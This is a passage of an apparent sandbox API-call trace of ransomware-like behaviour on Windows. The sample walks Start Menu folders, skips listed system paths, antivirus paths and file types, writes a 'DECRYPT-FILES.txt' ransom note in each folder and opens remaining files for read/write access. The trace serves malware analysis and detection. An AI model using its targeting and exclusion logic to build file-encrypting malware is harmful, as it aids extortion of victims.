Menu\\Programs\\Accessories\\System Tools\\", lpSrch="AhnLab") returned 0x0 [0080.426] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.426] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 109 [0080.426] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.426] wsprintfW (in: param_1=0x3f2d7cc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\jkbimi8.tmp") returned 121 [0080.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x468 [0080.426] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 109 [0080.427] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.427] wsprintfW (in: param_1=0x3f2d7cc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\DECRYPT-FILES.txt") returned 127 [0080.427] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0080.427] WriteFile (in: hFile=0x46c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2d7c8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2d7c8*=0x23fc, lpOverlapped=0x0) returned 1 [0080.428] CloseHandle (hObject=0x46c) returned 1 [0080.429] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 109 [0080.429] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*" [0080.429] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac219a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac219a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8dd8 [0080.429] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.429] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac219a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac219a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.429] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.429] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.429] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0d0d6f, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="computer.lnk", cAlternateFileName="")) returned 1 [0080.429] lstrcmpiW (lpString1="computer.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.429] lstrcmpiW (lpString1="computer.lnk", lpString2="autorun.inf") returned 1 [0080.429] lstrcmpiW (lpString1="computer.lnk", lpString2="boot.ini") returned 1 [0080.429] lstrcmpiW (lpString1="computer.lnk", lpString2="desktop.ini") returned -1 [0080.429] lstrcmpiW (lpString1="computer.lnk", lpString2="ntuser.dat") returned -1 [0080.429] lstrcmpiW (lpString1="computer.lnk", lpString2="iconcache.db") returned -1 [0080.429] lstrcmpiW (lpString1="computer.lnk", lpString2="bootsect.bak") returned 1 [0080.429] lstrcmpiW (lpString1="computer.lnk", lpString2="ntuser.dat.log") returned -1 [0080.429] lstrcmpiW (lpString1="computer.lnk", lpString2="thumbs.db") returned -1 [0080.429] lstrcmpiW (lpString1="computer.lnk", lpString2="Bootfont.bin") returned 1 [0080.429] lstrlenW (lpString="computer.lnk") returned 12 [0080.429] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.429] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e084aaf, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Control Panel.lnk", cAlternateFileName="CONTRO~1.LNK")) returned 1 [0080.429] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.429] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="autorun.inf") returned 1 [0080.429] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="boot.ini") returned 1 [0080.429] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="desktop.ini") returned -1 [0080.429] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="ntuser.dat") returned -1 [0080.429] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="iconcache.db") returned -1 [0080.429] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="bootsect.bak") returned 1 [0080.429] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="ntuser.dat.log") returned -1 [0080.429] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="thumbs.db") returned -1 [0080.429] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="Bootfont.bin") returned 1 [0080.430] lstrlenW (lpString="Control Panel.lnk") returned 17 [0080.430] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.430] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac219a80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac219a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac219a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.430] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.430] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0080.430] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0080.430] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0080.430] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0080.430] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0080.430] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x5df, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (No Add-ons).lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0080.430] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.430] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="autorun.inf") returned 1 [0080.430] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="boot.ini") returned 1 [0080.430] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="desktop.ini") returned 1 [0080.430] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="ntuser.dat") returned -1 [0080.430] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="iconcache.db") returned 1 [0080.430] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="bootsect.bak") returned 1 [0080.430] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="ntuser.dat.log") returned -1 [0080.430] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="thumbs.db") returned -1 [0080.430] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="Bootfont.bin") returned 1 [0080.430] lstrlenW (lpString="Internet Explorer (No Add-ons).lnk") returned 34 [0080.430] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.430] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac219a80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac219a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac219a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.431] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.431] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.431] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.431] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.431] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.431] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.431] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.431] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.431] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.431] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.431] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.431] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.431] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.431] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.431] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.431] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 109 [0080.431] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.431] lstrcpyW (in: lpString1=0x3f2d7bc, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\" [0080.431] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\jkbimi8.tmp" [0080.431] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.431] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.431] CloseHandle (hObject=0x0) returned 0 [0080.431] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.432] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 1 [0080.432] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.432] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="autorun.inf") returned 1 [0080.432] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="boot.ini") returned 1 [0080.432] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="desktop.ini") returned 1 [0080.432] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="ntuser.dat") returned 1 [0080.432] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="iconcache.db") returned 1 [0080.432] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="bootsect.bak") returned 1 [0080.432] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="ntuser.dat.log") returned 1 [0080.432] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="thumbs.db") returned -1 [0080.432] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="Bootfont.bin") returned 1 [0080.432] lstrlenW (lpString="Private Character Editor.lnk") returned 28 [0080.432] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.432] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 0 [0080.432] FindClose (in: hFindFile=0x5f8dd8 | out: hFindFile=0x5f8dd8) returned 1 [0080.432] CloseHandle (hObject=0x468) returned 1 [0080.432] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0080.432] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.432] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="autorun.inf") returned 1 [0080.432] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="boot.ini") returned 1 [0080.433] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="desktop.ini") returned 1 [0080.433] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat") returned 1 [0080.433] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="iconcache.db") returned 1 [0080.433] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="bootsect.bak") returned 1 [0080.433] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat.log") returned 1 [0080.433] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="thumbs.db") returned 1 [0080.433] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0080.433] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0080.433] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.433] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0080.433] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0080.433] CloseHandle (hObject=0x460) returned 1 [0080.433] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1 [0080.433] lstrcmpW (lpString1="Administrative Tools", lpString2=".") returned 1 [0080.433] lstrcmpW (lpString1="Administrative Tools", lpString2="..") returned 1 [0080.433] lstrcatW (in: lpString1="Administrative Tools", lpString2="\\" | out: lpString1="Administrative Tools\\") returned="Administrative Tools\\" [0080.433] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Administrative Tools\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\" [0080.433] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Program Files") returned 0x0 [0080.433] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch=":\\Windows") returned 0x0 [0080.433] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Games\\") returned 0x0 [0080.433] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.433] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.433] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.433] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.433] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.433] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\All Users") returned 0x0 [0080.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="AhnLab") returned 0x0 [0080.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.434] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 105 [0080.434] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.434] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\jkbimi8.tmp") returned 117 [0080.434] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0080.434] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 105 [0080.434] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.434] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\DECRYPT-FILES.txt") returned 123 [0080.434] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0080.435] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0080.436] CloseHandle (hObject=0x464) returned 1 [0080.436] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 105 [0080.436] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*" 